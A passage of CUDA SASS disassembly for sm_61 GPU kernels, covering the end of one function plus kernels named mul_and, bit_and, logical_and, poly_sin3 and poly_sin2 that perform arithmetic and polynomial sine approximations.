/*0d08*/ { SEL R11, R7.reuse, R11, P3 ; /* 0x5ca0018000b7070b */
/*0d10*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/*0d18*/ F2F.F64.F32 R12, R26 ; /* 0x5ca8000001a70b0c */
/* 0x001f8c00fe200771 */
/*0d28*/ DSETP.GT.AND P1, PT, R4, R10, PT ; /* 0x5b84038000a7040f */
/*0d30*/ SEL R16, R6, R16, P2 ; /* 0x5ca0010001070610 */
/*0d38*/ SEL R17, R7, R17, P2 ; /* 0x5ca0010001170711 */
/* 0x011fc400ff202751 */
/*0d48*/ DSETP.GT.AND P3, PT, R22, R12, PT ; /* 0x5b84038000c7161f */
/*0d50*/ FSETP.GT.AND P2, PT, R25, R26, PT ; /* 0x5bb4038001a71917 */
/*0d58*/ SEL R2, R4, R10, P1 ; /* 0x5ca0008000a70402 */
/* 0x001fcc04fe0007f4 */
/*0d68*/ SEL R4, R10, R4, P1 ; /* 0x5ca0008000470a04 */
/*0d70*/ { SEL R22, R12, R22, P3 ; /* 0x5ca0018001670c16 */
/*0d78*/ DEPBAR.LE SB5, 0x1 }
/* 0xf0f0000034170000 */
/* 0x009fc400fe200261 */
/*0d88*/ F2F.F64.F32 R14, R3 ; /* 0x5ca8000000370b0e */
/*0d90*/ FSETP.GT.AND P0, PT, R26, R3, PT ; /* 0x5bb4038000371a07 */
/*0d98*/ SEL R3, R5, R11, P1 ; /* 0x5ca0008000b70503 */
/* 0x001fc400fe2007f1 */
/*0da8*/ SEL R5, R11, R5, P1 ; /* 0x5ca0008000570b05 */
/*0db0*/ SEL R23, R13, R23, P3 ; /* 0x5ca0018001770d17 */
/*0db8*/ SEL R30, R6, R12, P2 ; /* 0x5ca0010000c7061e */
/* 0x001e3400ea2007e3 */
/*0dc8*/ SEL R31, R7, R13, P2 ; /* 0x5ca0010000d7071f */
/*0dd0*/ DFMA R2, R2, 2, R4 ; /* 0x3670024000070202 */
/*0dd8*/ DSETP.GT.AND P4, PT, R16, R22, PT ; /* 0x5b84038001671027 */
/* 0x005cc408ee210911 */
/*0de8*/ F2F.F64.F32 R18, R20 ; /* 0x5ca8000001470b12 */
/*0df0*/ DSETP.GT.AND P3, PT, R30, R14, PT ; /* 0x5b84038000e71e1f */
/*0df8*/ F2F.F64.F32 R20, R21 ; /* 0x5ca8000001570b14 */
/* 0x001fd800fc202731 */
/*0e08*/ DADD R2, R2, +QNAN ; /* 0x3870007ff8070202 */
/*0e10*/ SEL R10, R12, R6, P2 ; /* 0x5ca0010000670c0a */
/*0e18*/ SEL R11, R13, R7, P2 ; /* 0x5ca0010000770d0b */
/* 0x001fc410fe201151 */
/*0e28*/ DADD R20, R2, R20 ; /* 0x5c70000001470214 */
/*0e30*/ SEL R6, R16, R22, P4 ; /* 0x5ca0020001671006 */
/*0e38*/ SEL R7, R17, R23, P4 ; /* 0x5ca0020001771107 */
/* 0x091fc400fc2007f1 */
/*0e48*/ SEL R16, R22, R16, P4 ; /* 0x5ca0020001071610 */
/*0e50*/ SEL R17, R23, R17, P4 ; /* 0x5ca0020001171711 */
/*0e58*/ SEL R4, R14.reuse, R30, P3 ; /* 0x5ca0018001e70e04 */
/* 0x001dc400fe6007f1 */
/*0e68*/ SEL R5, R15, R31, P3 ; /* 0x5ca0018001f70f05 */
/*0e70*/ SEL R8, R12, R14, P0 ; /* 0x5ca0000000e70c08 */
/*0e78*/ DFMA R6, R6, 2, R16 ; /* 0x3670084000070606 */
/* 0x009cc402fc2007f1 */
/*0e88*/ SEL R9, R13, R15, P0 ; /* 0x5ca0000000f70d09 */
/*0e90*/ SEL R2, R14, R12, P0 ; /* 0x5ca0000000c70e02 */
/*0e98*/ F2F.F32.F64 R12, R20 ; /* 0x5ca8000001470e0c */
/* 0x001fc401e2200753 */
/*0ea8*/ DSETP.GT.AND P1, PT, R10, R4, PT ; /* 0x5b84038000470a0f */
/*0eb0*/ DSETP.GT.AND P2, PT, R8, R18, PT ; /* 0x5b84038001270817 */
/*0eb8*/ SEL R3, R15, R13, P0 ; /* 0x5ca0000000d70f03 */
/* 0x011cc402ed004772 */
/*0ec8*/ DADD R6, R6, +QNAN ; /* 0x3870007ff8070606 */
/*0ed0*/ F2F.F64.F32 R12, R12 ; /* 0x5ca8000000c70b0c */
/*0ed8*/ DADD R6, R6, R12 ; /* 0x5c70000000c70606 */
/* 0x001fc400fe2027f1 */
/*0ee8*/ SEL R14, R10, R4, P1 ; /* 0x5ca0008000470a0e */
/*0ef0*/ SEL R15, R11, R5, P1 ; /* 0x5ca0008000570b0f */
/*0ef8*/ SEL R4, R4, R10, P1 ; /* 0x5ca0008000a70404 */
/* 0x001fc801fc2007f1 */
/*0f08*/ SEL R5, R5, R11, P1 ; /* 0x5ca0008000b70505 */
/*0f10*/ SEL R8, R18, R8, P2 ; /* 0x5ca0010000871208 */
/*0f18*/ SEL R9, R19, R9, P2 ; /* 0x5ca0010000971309 */
/* 0x001d4400e7a01712 */
/*0f28*/ F2F.F32.F64 R6, R6 ; /* 0x5ca8000000670e06 */
/*0f30*/ DFMA R4, R14, 2, R4 ; /* 0x3670024000070e04 */
/*0f38*/ DSETP.GT.AND P0, PT, R2, R8, PT ; /* 0x5b84038000870207 */
/* 0x003c1402e3000f11 */
/*0f48*/ F2F.F64.F32 R6, R6 ; /* 0x5ca8000000670b06 */
/*0f50*/ DADD R4, R4, +QNAN ; /* 0x3870007ff8070404 */
/*0f58*/ DADD R4, R4, R6 ; /* 0x5c70000000670404 */
/* 0x001fc400fe2027f1 */
/*0f68*/ SEL R10, R2, R8, P0 ; /* 0x5ca000000087020a */
/*0f70*/ SEL R11, R3, R9, P0 ; /* 0x5ca000000097030b */
/*0f78*/ SEL R8, R8, R2, P0 ; /* 0x5ca0000000270808 */
/* 0x001c8c01e2a007f1 */
/*0f88*/ SEL R9, R9, R3, P0 ; /* 0x5ca0000000370909 */
/*0f90*/ F2F.F32.F64 R4, R4 ; /* 0x5ca8000000470e04 */
/*0f98*/ DFMA R2, R10, 2, R8 ; /* 0x3670044000070a02 */
/* 0x001fdc02e2200f15 */
/*0fa8*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/*0fb0*/ DADD R2, R2, +QNAN ; /* 0x3870007ff8070202 */
/*0fb8*/ ISETP.NE.AND P0, PT, R28, RZ, PT ; /* 0x5b6b03800ff71c07 */
/* 0x001ff80106000f18 */
/*0fc8*/ DADD R2, R2, R4 ; /* 0x5c70000000470202 */
/*0fd0*/ { F2F.F32.F64 R20, R2 ; /* 0x5ca8000000270e14 */
/*0fd8*/ @P0 BRA 0x2d8 }
/* 0xe2400fff2f80000f */
/* 0x001f8801fcc007e1 */
/*0fe8*/ SHR R0, R0, 0x1e ; /* 0x3829000001e70000 */
/*0ff0*/ IADD R2.CC, R24, c[0x0][0x150] ; /* 0x4c10800005471802 */
/*0ff8*/ IADD.X R3, R0, c[0x0][0x154] ; /* 0x4c10080005570003 */
/* 0x001ffc00ffe017f5 */
/*1008*/ STG.E [R2], R20 ; /* 0xeedc200000070214 */
/*1010*/ EXIT ; /* 0xe30000000007000f */
/*1018*/ BRA 0x1018 ; /* 0xe2400fffff87000f */
/* 0x001f8000fc0007e0 */
/*1028*/ NOP; /* 0x50b0000000070f00 */
/*1030*/ NOP; /* 0x50b0000000070f00 */
/*1038*/ NOP; /* 0x50b0000000070f00 */
...........................
Function : _Z7mul_andPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001cfc00e22007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ S2R R2, SR_CTAID.X ; /* 0xf0c8000002570002 */
/*0018*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/* 0x001fd802fcc00fe1 */
/*0028*/ XMAD.MRG R3, R2, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270203 */
/*0030*/ XMAD R0, R2, c[0x0] [0x8], R0 ; /* 0x4e00000000270200 */
/*0038*/ XMAD.PSL.CBCC R2, R2.H1, R3.H1, R0 ; /* 0x5b30001800370202 */
/* 0x001f8800fcc207f1 */
/*0048*/ SHR R0, R2.reuse, 0x1e ; /* 0x3829000001e70200 */
/*0050*/ ISCADD R2.CC, R2, c[0x0][0x150], 0x2 ; /* 0x4c18810005470202 */
/*0058*/ IADD.X R3, R0, c[0x0][0x154] ; /* 0x4c10080005570003 */
/* 0x001ffc00ffe007f5 */
/*0068*/ STG.E [R2], RZ ; /* 0xeedc2000000702ff */
/*0070*/ EXIT ; /* 0xe30000000007000f */
/*0078*/ BRA 0x78 ; /* 0xe2400fffff87000f */
..............................
Function : _Z7bit_andPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001cfc00e22007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ S2R R2, SR_CTAID.X ; /* 0xf0c8000002570002 */
/*0018*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/* 0x001fd802fcc00fe1 */
/*0028*/ XMAD.MRG R3, R2, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270203 */
/*0030*/ XMAD R0, R2, c[0x0] [0x8], R0 ; /* 0x4e00000000270200 */
/*0038*/ XMAD.PSL.CBCC R2, R2.H1, R3.H1, R0 ; /* 0x5b30001800370202 */
/* 0x001f8800fcc207f1 */
/*0048*/ SHR R0, R2.reuse, 0x1e ; /* 0x3829000001e70200 */
/*0050*/ ISCADD R2.CC, R2, c[0x0][0x150], 0x2 ; /* 0x4c18810005470202 */
/*0058*/ IADD.X R3, R0, c[0x0][0x154] ; /* 0x4c10080005570003 */
/* 0x001ffc00ffe007f5 */
/*0068*/ STG.E [R2], RZ ; /* 0xeedc2000000702ff */
/*0070*/ EXIT ; /* 0xe30000000007000f */
/*0078*/ BRA 0x78 ; /* 0xe2400fffff87000f */
..............................
Function : _Z11logical_andPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001cfc00e22007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ S2R R2, SR_CTAID.X ; /* 0xf0c8000002570002 */
/*0018*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/* 0x001fd802fcc00fe1 */
/*0028*/ XMAD.MRG R3, R2, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270203 */
/*0030*/ XMAD R0, R2, c[0x0] [0x8], R0 ; /* 0x4e00000000270200 */
/*0038*/ XMAD.PSL.CBCC R2, R2.H1, R3.H1, R0 ; /* 0x5b30001800370202 */
/* 0x001f8800fcc207f1 */
/*0048*/ SHR R0, R2.reuse, 0x1e ; /* 0x3829000001e70200 */
/*0050*/ ISCADD R2.CC, R2, c[0x0][0x150], 0x2 ; /* 0x4c18810005470202 */
/*0058*/ IADD.X R3, R0, c[0x0][0x154] ; /* 0x4c10080005570003 */
/* 0x001ffc00ffe007f5 */
/*0068*/ STG.E [R2], RZ ; /* 0xeedc2000000702ff */
/*0070*/ EXIT ; /* 0xe30000000007000f */
/*0078*/ BRA 0x78 ; /* 0xe2400fffff87000f */
...................................
Function : _Z9poly_sin3PKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV32I R21, 0xffffff00 ; /* 0x010ffffff007f015 */
/*0018*/ S2R R2, SR_CTAID.X }
/* 0xf0c8000002570002 */
/* 0x085fd841fe20073f */
/*0028*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/*0030*/ XMAD.MRG R3, R2.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270203 */
/*0038*/ XMAD R0, R2.reuse, c[0x0] [0x8], R0 ; /* 0x4e00000000270200 */
/* 0x001f9800fea007f1 */
/*0048*/ XMAD.PSL.CBCC R2, R2.H1, R3.H1, R0 ; /* 0x5b30001800370202 */
/*0050*/ MOV R0, RZ ; /* 0x5c9807800ff70000 */
/*0058*/ MOV R3, R2 ; /* 0x5c98078000270003 */
/* 0x081fc440fe2207f1 */
/*0068*/ SHR.U32 R4, R3.reuse, 0x1e ; /* 0x3828000001e70304 */
/*0070*/ IADD32I R10, R3.reuse, 0x1 ; /* 0x1c0000000017030a */
/*0078*/ ISCADD R8.CC, R3.reuse, c[0x0][0x140], 0x2 ; /* 0x4c18810005070308 */
/* 0x081fc000fe4007f5 */
/*0088*/ IADD32I R14, R3, 0x2 ; /* 0x1c0000000027030e */
/*0090*/ IADD.X R9, R4, c[0x0][0x144] ; /* 0x4c10080005170409 */
/*0098*/ { SHR.U32 R4, R10.reuse, 0x1e ; /* 0x3828000001e70a04 */
/* 0x081fc400fc2000b1 */
/*00a8*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*00b0*/ ISCADD R10.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a0a */
/*00b8*/ IADD32I R18, R3.reuse, 0x3 ; /* 0x1c00000000370312 */
/* 0x001fc000fe4207f4 */
/*00c8*/ SHR.U32 R6, R14.reuse, 0x1e ; /* 0x3828000001e70e06 */
/*00d0*/ IADD.X R11, R4, c[0x0][0x144] ; /* 0x4c1008000517040b */
/*00d8*/ { ISCADD R14.CC, R14, c[0x0][0x140], 0x2 ; /* 0x4c18810005070e0e */
/* 0x001f9000fe2001b1 */
/*00e8*/ LDG.E R4, [R10] }
/* 0xeed4200000070a04 */
/*00f0*/ SHR.U32 R7, R18, 0x1e ; /* 0x3828000001e71207 */
/*00f8*/ IADD32I R16, R3, 0x4 ; /* 0x1c00000000470310 */
/* 0x000ac400fe0007f2 */
/*0108*/ IADD.X R15, R6, c[0x0][0x144] ; /* 0x4c1008000517060f */
/*0110*/ { ISCADD R18.CC, R18, c[0x0][0x140], 0x2 ; /* 0x4c18810005071212 */
/*0118*/ LDG.E R6, [R14] }
/* 0xeed4200000070e06 */
/* 0x001fc800fe820ff1 */
/*0128*/ SHR.U32 R8, R16.reuse, 0x1e ; /* 0x3828000001e71008 */
/*0130*/ IADD32I R12, R3, 0x5 ; /* 0x1c0000000057030c */
/*0138*/ IADD.X R19, R7, c[0x0][0x144] ; /* 0x4c10080005170713 */
/* 0x005f8400162007f0 */
/*0148*/ { ISCADD R16.CC, R16, c[0x0][0x140], 0x2 ; /* 0x4c18810005071010 */
/*0150*/ LDG.E R7, [R18] }
/* 0xeed4200000071207 */
/*0158*/ SHR.U32 R10, R12, 0x1e ; /* 0x3828000001e70c0a */
/* 0x001fc000fe4207f4 */
/*0168*/ IADD32I R9, R3.reuse, 0x6 ; /* 0x1c00000000670309 */
/*0170*/ IADD.X R17, R8, c[0x0][0x144] ; /* 0x4c10080005170811 */
/*0178*/ { ISCADD R12.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c0c */
/* 0x001fc840fea001b1 */
/*0188*/ LDG.E R8, [R16] }
/* 0xeed4200000071008 */
/*0190*/ SHR.U32 R20, R9.reuse, 0x1e ; /* 0x3828000001e70914 */
/*0198*/ IADD.X R13, R10, c[0x0][0x144] ; /* 0x4c10080005170a0d */
/* 0x001f9400562027f0 */
/*01a8*/ { ISCADD R14.CC, R9, c[0x0][0x140], 0x2 ; /* 0x4c1881000507090e */
/*01b0*/ LDG.E R9, [R12] }
/* 0xeed4200000070c09 */
/*01b8*/ IADD32I R10, R3, 0x7 ; /* 0x1c0000000077030a */
/* 0x003fc040fe2007f1 */
/*01c8*/ IADD.X R15, R20, c[0x0][0x144] ; /* 0x4c1008000517140f */
/*01d0*/ SHR.U32 R11, R10.reuse, 0x1e ; /* 0x3828000001e70a0b */
/*01d8*/ { ISCADD R18.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a12 */
/* 0x001ec400fe4000b6 */
/*01e8*/ LDG.E R10, [R14] }
/* 0xeed4200000070e0a */
/*01f0*/ IADD.X R19, R11, c[0x0][0x144] ; /* 0x4c10080005170b13 */
/*01f8*/ LDG.E R11, [R18] ; /* 0xeed420000007120b */
/* 0x001fb000fe2007e6 */
/*0208*/ IADD32I R21, R21, 0x8 ; /* 0x1c00000000871515 */
/*0210*/ ISETP.NE.AND P0, PT, R21, RZ, PT ; /* 0x5b6b03800ff71507 */
/*0218*/ IADD32I R3, R3, 0x8 ; /* 0x1c00000000870303 */
/* 0x085fd440fe2007f3 */
/*0228*/ DEPBAR.LE SB5, 0x6 ; /* 0xf0f0000034670000 */
/*0230*/ FMUL32I R20, R5.reuse, -0.00018269040447194129229 ; /* 0x1e0b93f909570514 */
/*0238*/ FMUL R16, R5.reuse, R5 ; /* 0x5c68000000570510 */
/* 0x001fc400fca007f1 */
/*0248*/ FFMA R17, R5, R20, c[0x2][0x0] ; /* 0x51800a0800070511 */
/*0250*/ FMUL32I R23, R4, -0.00018269040447194129229 ; /* 0x1e0b93f909570417 */
/*0258*/ FFMA R22, R16, R17, c[0x2][0x4] ; /* 0x5180088800171016 */
/* 0x009fc400fe6007f0 */
/*0268*/ { FMUL R16, R5, R16 ; /* 0x5c68000001070510 */
/*0270*/ DEPBAR.LE SB5, 0x4 }
/* 0xf0f0000034470000 */
/*0278*/ FMUL32I R12, R6, -0.00018269040447194129229 ; /* 0x1e0b93f90957060c */
/* 0x001f8400fe2207f1 */
/*0288*/ FMUL R13, R4.reuse, R4 ; /* 0x5c6800000047040d */
/*0290*/ FFMA R23, R4, R23, c[0x2][0x0] ; /* 0x51800b8800070417 */
/*0298*/ FFMA R22, R16, R22, R5 ; /* 0x5980028001671016 */
/* 0x003fc400fe2207f2 */
/*02a8*/ FMUL R5, R6.reuse, R6 ; /* 0x5c68000000670605 */
/*02b0*/ FFMA R12, R6, R12, c[0x2][0x0] ; /* 0x518006080007060c */
/*02b8*/ FMUL32I R14, R7, -0.00018269040447194129229 ; /* 0x1e0b93f90957070e */
/* 0x001f8800fe2007f1 */
/*02c8*/ FFMA R23, R13, R23, c[0x2][0x4] ; /* 0x51800b8800170d17 */
/*02d0*/ FMUL R13, R4, R13 ; /* 0x5c68000000d7040d */
/*02d8*/ FADD R22, R22, R0 ; /* 0x5c58000000071616 */
/* 0x001fc440fe2007f1 */
/*02e8*/ FFMA R12, R5, R12, c[0x2][0x4] ; /* 0x518006080017050c */
/*02f0*/ FMUL R0, R7.reuse, R7 ; /* 0x5c68000000770700 */
/*02f8*/ FFMA R14, R7, R14, c[0x2][0x0] ; /* 0x518007080007070e */
/* 0x001fc400fe6007f0 */
/*0308*/ { FMUL R5, R6, R5 ; /* 0x5c68000000570605 */
/*0310*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/*0318*/ FMUL32I R15, R8, -0.00018269040447194129229 ; /* 0x1e0b93f90957080f */
/* 0x001fc400fe2007e1 */
/*0328*/ FFMA R13, R13, R23, R4 ; /* 0x5980020001770d0d */
/*0330*/ FFMA R14, R0, R14, c[0x2][0x4] ; /* 0x518007080017000e */
/*0338*/ FFMA R12, R5, R12, R6 ; /* 0x5980030000c7050c */
/* 0x001fc440fe2007f1 */
/*0348*/ FMUL R0, R7, R0 ; /* 0x5c68000000070700 */
/*0350*/ FMUL R5, R8.reuse, R8 ; /* 0x5c68000000870805 */
/*0358*/ FFMA R15, R8, R15, c[0x2][0x0] ; /* 0x518007880007080f */
/* 0x001fc400fe4007e1 */
/*0368*/ FMUL32I R4, R9, -0.00018269040447194129229 ; /* 0x1e0b93f909570904 */
/*0370*/ FADD R13, R22, R13 ; /* 0x5c58000000d7160d */
/*0378*/ FFMA R14, R0, R14, R7 ; /* 0x5980038000e7000e */
/* 0x001fc400fe2207f1 */
/*0388*/ FMUL R0, R9.reuse, R9 ; /* 0x5c68000000970900 */
/*0390*/ FFMA R15, R5, R15, c[0x2][0x4] ; /* 0x518007880017050f */
/*0398*/ FFMA R6, R9, R4, c[0x2][0x0] ; /* 0x5180020800070906 */
/* 0x001fc460fe2007e1 */
/*03a8*/ FMUL R5, R8, R5 ; /* 0x5c68000000570805 */
/*03b0*/ FMUL32I R7, R10.reuse, -0.00018269040447194129229 ; /* 0x1e0b93f909570a07 */
/*03b8*/ FADD R12, R13, R12 ; /* 0x5c58000000c70d0c */
/* 0x001fc400fe2007f2 */
/*03c8*/ FMUL R4, R10, R10 ; /* 0x5c68000000a70a04 */
/*03d0*/ FFMA R6, R0, R6, c[0x2][0x4] ; /* 0x5180030800170006 */
/*03d8*/ FFMA R5, R5, R15, R8 ; /* 0x5980040000f70505 */
/* 0x081fc400fe2007e1 */
/*03e8*/ FMUL R0, R9, R0 ; /* 0x5c68000000070900 */
/*03f0*/ FFMA R7, R10, R7, c[0x2][0x0] ; /* 0x5180038800070a07 */
/*03f8*/ FMUL32I R8, R11.reuse, -0.00018269040447194129229 ; /* 0x1e0b93f909570b08 */
/* 0x081fc400fe2007f3 */
/*0408*/ FADD R12, R12, R14 ; /* 0x5c58000000e70c0c */
/*0410*/ FFMA R0, R0, R6, R9 ; /* 0x5980048000670000 */
/*0418*/ FMUL R6, R11.reuse, R11 ; /* 0x5c68000000b70b06 */
/* 0x001fc400fe2007e1 */
/*0428*/ FFMA R8, R11, R8, c[0x2][0x0] ; /* 0x5180040800070b08 */
/*0430*/ FFMA R7, R4, R7, c[0x2][0x4] ; /* 0x5180038800170407 */
/*0438*/ FADD R5, R12, R5 ; /* 0x5c58000000570c05 */
/* 0x001fc400fe2007f3 */
/*0448*/ FMUL R4, R10, R4 ; /* 0x5c68000000470a04 */
/*0450*/ FFMA R8, R6, R8, c[0x2][0x4] ; /* 0x5180040800170608 */
/*0458*/ FMUL R6, R11, R6 ; /* 0x5c68000000670b06 */
/* 0x001fc800fe8007e1 */
/*0468*/ FADD R0, R5, R0 ; /* 0x5c58000000070500 */
/*0470*/ FFMA R7, R4, R7, R10 ; /* 0x5980050000770407 */
/*0478*/ FFMA R6, R6, R8, R11 ; /* 0x5980058000870606 */
/* 0x001ff400fe0007fd */
/*0488*/ FADD R0, R0, R7 ; /* 0x5c58000000770000 */
/*0490*/ { FADD R0, R0, R6 ; /* 0x5c58000000670000 */
/*0498*/ @P0 BRA 0x60 }
/* 0xe2400fffbc00000f */
/* 0x001f8800fcc207f1 */
/*04a8*/ SHR R3, R2.reuse, 0x1e ; /* 0x3829000001e70203 */
/*04b0*/ ISCADD R2.CC, R2, c[0x0][0x150], 0x2 ; /* 0x4c18810005470202 */
/*04b8*/ IADD.X R3, R3, c[0x0][0x154] ; /* 0x4c10080005570303 */
/* 0x001ffc00ffe007f5 */
/*04c8*/ STG.E [R2], R0 ; /* 0xeedc200000070200 */
/*04d0*/ EXIT ; /* 0xe30000000007000f */
/*04d8*/ BRA 0x4d8 ; /* 0xe2400fffff87000f */
/* 0x001f8000fc0007e0 */
/*04e8*/ NOP; /* 0x50b0000000070f00 */
/*04f0*/ NOP; /* 0x50b0000000070f00 */
/*04f8*/ NOP; /* 0x50b0000000070f00 */
................................
Function : _Z9poly_sin2PKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R10, RZ ; /* 0x5c9807800ff7000a */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x083fc400e7e007f0 */
/*0028*/ { MOV32I R22, 0xffffff00 ; /* 0x010ffffff007f016 */
/*0030*/ S2R R2, SR_TID.X }
/* 0xf0c8000002170002 */
/*0038*/ XMAD.MRG R3, R0.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/* 0x001fd800fec217f6 */
/*0048*/ XMAD R2, R0.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/*0050*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0058*/ MOV R12, R0 ; /* 0x5c9807800007000c */
/* 0x001f8801fcc207f1 */
/*0068*/ SHR.U32 R2, R12.reuse, 0x1e ; /* 0x3828000001e70c02 */
/*0070*/ ISCADD R4.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c04 */
/*0078*/ IADD.X R5, R2, c[0x0][0x144] ; /* 0x4c10080005170205 */
/* 0x081fc400fec000b1 */
/*0088*/ LDG.E R4, [R4] ; /* 0xeed4200000070404 */
/*0090*/ IADD32I R2, R12, 0x1 ; /* 0x1c00000000170c02 */
/*0098*/ SHR.U32 R3, R2.reuse, 0x1e ; /* 0x3828000001e70203 */
/* 0x0046c400fc4007e6 */
/*00a8*/ ISCADD R2.CC, R2, c[0x0][0x140], 0x2 ; /* 0x4c18810005070202 */
/*00b0*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*00b8*/ LDG.E R19, [R2] ; /* 0xeed4200000070213 */
/* 0x001f9840fe2007f6 */
/*00c8*/ IADD32I R6, R12, 0x2 ; /* 0x1c00000000270c06 */
/*00d0*/ SHR.U32 R7, R6.reuse, 0x1e ; /* 0x3828000001e70607 */
/*00d8*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/* 0x001fd800562007e2 */
/*00e8*/ IADD.X R7, R7, c[0x0][0x144] ; /* 0x4c10080005170707 */
/*00f0*/ LDG.E R18, [R6] ; /* 0xeed4200000070612 */
/*00f8*/ IADD32I R8, R12, 0x3 ; /* 0x1c00000000370c08 */
/* 0x001f8800fcc20ff1 */
/*0108*/ SHR.U32 R5, R8.reuse, 0x1e ; /* 0x3828000001e70805 */
/*0110*/ ISCADD R8.CC, R8, c[0x0][0x140], 0x2 ; /* 0x4c18810005070808 */
/*0118*/ IADD.X R9, R5, c[0x0][0x144] ; /* 0x4c10080005170509 */
/* 0x085fc400fec007b1 */
/*0128*/ LDG.E R17, [R8] ; /* 0xeed4200000070811 */
/*0130*/ IADD32I R5, R12, 0x4 ; /* 0x1c00000000470c05 */
/*0138*/ SHR.U32 R3, R5.reuse, 0x1e ; /* 0x3828000001e70503 */
/* 0x0002c400fc4007e6 */
/*0148*/ ISCADD R2.CC, R5, c[0x0][0x140], 0x2 ; /* 0x4c18810005070502 */
/*0150*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*0158*/ LDG.E R16, [R2] ; /* 0xeed4200000070210 */
/* 0x001f9840fe2027f6 */
/*0168*/ IADD32I R6, R12, 0x5 ; /* 0x1c00000000570c06 */
/*0170*/ SHR.U32 R5, R6.reuse, 0x1e ; /* 0x3828000001e70605 */
/*0178*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/* 0x001fd800362007e2 */
/*0188*/ IADD.X R7, R5, c[0x0][0x144] ; /* 0x4c10080005170507 */
/*0190*/ LDG.E R15, [R6] ; /* 0xeed420000007060f */
/*0198*/ IADD32I R24, R12, 0x6 ; /* 0x1c00000000670c18 */
/* 0x001f8800fcc207f1 */
/*01a8*/ SHR.U32 R5, R24.reuse, 0x1e ; /* 0x3828000001e71805 */
/*01b0*/ ISCADD R24.CC, R24, c[0x0][0x140], 0x2 ; /* 0x4c18810005071818 */
/*01b8*/ IADD.X R25, R5, c[0x0][0x144] ; /* 0x4c10080005170519 */
/* 0x083fc400fec002b1 */
/*01c8*/ LDG.E R14, [R24] ; /* 0xeed420000007180e */
/*01d0*/ IADD32I R26, R12, 0x7 ; /* 0x1c00000000770c1a */
/*01d8*/ SHR.U32 R2, R26.reuse, 0x1e ; /* 0x3828000001e71a02 */
/* 0x001ec400fc4007e6 */
/*01e8*/ ISCADD R26.CC, R26, c[0x0][0x140], 0x2 ; /* 0x4c18810005071a1a */
/*01f0*/ IADD.X R27, R2, c[0x0][0x144] ; /* 0x4c1008000517021b */
/*01f8*/ LDG.E R13, [R26] ; /* 0xeed4200000071a0d */
/* 0x101cc400fe600714 */
/*0208*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/*0210*/ DEPBAR.LE SB5, 0x7 ; /* 0xf0f0000034770000 */
/*0218*/ F2F.F64.F32 R8, R4.reuse ; /* 0x5ca8000000470b08 */
/* 0x100e4402e42007f7 */
/*0228*/ FMUL R5, R4, R4 ; /* 0x5c68000000470405 */
/*0230*/ DMUL R6, R8, c[0x2][0x0] ; /* 0x4c80000800070806 */
/*0238*/ F2F.F64.F32 R2, R5.reuse ; /* 0x5ca8000000570b02 */
/* 0x011cdc02f22007f6 */
/*0248*/ FMUL R4, R4, R5 ; /* 0x5c68000000570404 */
/*0250*/ DFMA R20, R8, R6, c[0x2][0x8] ; /* 0x5370030800270814 */
/*0258*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/* 0x011d8400fe608330 */
/*0268*/ { DFMA R6, R2, R20, c[0x2][0x10] ; /* 0x53700a0800470206 */
/*0270*/ DEPBAR.LE SB5, 0x6 }
/* 0xf0f0000034670000 */
/*0278*/ F2F.F64.F32 R2, R19 ; /* 0x5ca8000001370b02 */
/* 0x091d4402226027f4 */
/*0288*/ FMUL R24, R19, R19 ; /* 0x5c68000001371318 */
/*0290*/ DFMA R8, R4, R6, R8 ; /* 0x5b70040000670408 */
/*0298*/ DMUL R20, R2.reuse, c[0x2][0x0] ; /* 0x4c80000800070214 */
/* 0x008888010e601734 */
/*02a8*/ F2F.F64.F32 R4, R24 ; /* 0x5ca8000001870b04 */
